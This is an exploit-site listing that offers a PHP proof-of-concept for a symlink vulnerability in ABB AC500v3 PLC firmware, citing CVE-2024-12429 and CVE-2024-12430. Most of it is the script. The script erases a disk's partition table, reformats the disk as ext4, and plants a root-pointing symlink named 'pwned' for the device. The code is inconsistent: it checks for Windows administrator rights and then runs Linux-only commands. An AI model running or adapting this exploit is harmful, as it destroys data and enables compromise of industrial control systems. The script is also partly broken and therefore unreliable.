Share
## https://sploitus.com/exploit?id=PACKETSTORM:189687
=============================================================================================================================================
| # Title : ABB AC500v3 3.7.0.569 Exploiting Symlink vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://global.abb/ |
=============================================================================================================================================
POC :
[+] Dorking İn Google Or Other Search Enggine.
[+] Code Description: Exploiting Symlink on ABB AC500 System Using PHP.
(Related : https://packetstorm.news/files/id/188713/ Related CVE numbers: CVE-2024-12429, CVE-2024-12430 ) .
[+] Usage : C:\www>php 2.php /dev/sdX
[+] PayLoad :
<?php
// indoushka
// abb ac500 symlink exploit
// تحقق إذا كان المستخدم قد أدخل معطى (اسم القرص) من سطر الأوامر
if ($argc != 2) {
echo "Usage: php abb_ac500_symlink.php /dev/sdX\n";
exit(1);
}
// تحقق إذا كان البرنامج يعمل بصلاحيات المسؤول في ويندوز
$isAdmin = (bool) shell_exec('NET SESSION');
if (!$isAdmin) {
echo "This script must be run as Administrator.\n";
exit(1);
}
$disk = $argv[1];
$part = $disk . "1";
$mountPoint = "/mnt/sdcard";
$symLinkTarget = "/";
$symLinkName = "pwned";
// محاولة إلغاء تحميل الأقراص المتصلة
exec("umount {$disk}* 2>/dev/null");
// حذف جميع الأقسام الحالية على القرص
$fdiskCommands = "o\nw\n";
file_put_contents("/tmp/fdisk_commands.txt", $fdiskCommands);
exec("fdisk {$disk} < /tmp/fdisk_commands.txt");
// إنشاء قسم جديد على القرص
$fdiskCommands = "n\np\n1\n\n\nw\n";
file_put_contents("/tmp/fdisk_commands.txt", $fdiskCommands);
exec("fdisk {$disk} < /tmp/fdisk_commands.txt");
exec("partprobe {$disk}");
// تنسيق القسم باستخدام ext4
exec("mkfs.ext4 -F {$part}");
// إنشاء مجلد للنقطة المثبتة
mkdir($mountPoint, 0777, true);
// تركيب القسم
exec("mount {$part} {$mountPoint}");
// إنشاء رابط رمزي
symlink($symLinkTarget, "{$mountPoint}/{$symLinkName}");
// عرض محتويات المجلد بعد إنشاء الرابط الرمزي
exec("ls -l {$mountPoint}");
// إلغاء تحميل القسم
exec("umount {$mountPoint}");
echo "Done.\n";
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================